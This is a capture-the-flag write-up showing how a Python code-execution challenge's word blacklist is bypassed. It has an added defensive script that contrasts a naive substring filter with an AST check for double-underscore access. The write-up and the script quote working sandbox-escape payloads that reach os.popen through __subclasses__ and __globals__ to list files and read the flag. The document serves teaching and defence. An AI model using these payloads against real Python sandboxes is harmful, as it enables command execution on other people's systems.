![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/8c71c4bb-540a-47dd-9634-a5cae54556b2)

Some items are blacklisted here, but it's essentially a sort of SSTI. I tried a basic payload.

`print(''.__class__.__mro__[1].__subclasses__())`

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/eb00a81f-7428-4cff-8683-3b7c88001e63)

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/da577c04-8ffc-4092-8475-3b53734cf0d2)

The 4th-last item is my [favourite](https://blog.p6.is/Python-SSTI-exploitable-classes/#Using-os-wrap-close).

`print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('ls').read())`

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/04537d2d-ec8a-4aae-910a-e967aadefb56)

`print(''.__class__.__mro__[1].__subclasses__()[-4].__init__.__globals__['sys'].modules['os'].popen('cat flag-cce1c56d-466d-4af9-8ae7-c7bcf99d5c49.txt').read())`

![image](https://github.com/jeromepalayoor/ctf-archive-hub/assets/63996033/0590a762-f28d-4ba3-9789-b6cb9f8219db)

Flag: `tjctf{oops_bad_filter_3b582f74}`
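
Why a word blacklist lets the payloads above through, shown as an added example that is not part of the original writeup or the challenge code. The blacklist contents and the function names are assumptions (the real list is only visible in the screenshot). The AST walk flags double-underscore access, which both payloads depend on; it is a detection aid, not a sandbox.

```python
import ast

# Hypothetical substring blacklist; the challenge's real list appears only in the screenshot.
ASSUMED_BLACKLIST = ("import", "eval", "exec", "os.", "subprocess", "system")

# Constructed sample submissions: one benign line plus two payloads quoted in this writeup.
SAMPLES = {
    "benign": "print(sum([1, 2, 3]))",
    "enumerate": "print(''.__class__.__mro__[1].__subclasses__())",
    "popen": ("print(''.__class__.__mro__[1].__subclasses__()[-4].__init__"
              ".__globals__['sys'].modules['os'].popen('ls').read())"),
}

def substring_filter_allows(src):
    """Naive filter: accept unless a blacklisted substring appears in the source."""
    return not any(word in src for word in ASSUMED_BLACKLIST)

def dunder_findings(src):
    """Sorted double-underscore names the code touches as attribute, name or string."""
    found = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            found.add(node.attr)
        elif isinstance(node, ast.Name) and node.id.startswith("__"):
            found.add(node.id)
        elif (isinstance(node, ast.Constant) and isinstance(node.value, str)
              and node.value.startswith("__")):
            found.add(node.value)  # covers getattr(obj, "__class__")
    return sorted(found)

def review(src):
    """Return (passes_substring_filter, passes_ast_check, dunder_names)."""
    names = dunder_findings(src)
    return substring_filter_allows(src), not names, names

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, review(src))
```
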

Original writeup (https://jpalayoor.com/web/TJCTF-2023.html#outdated).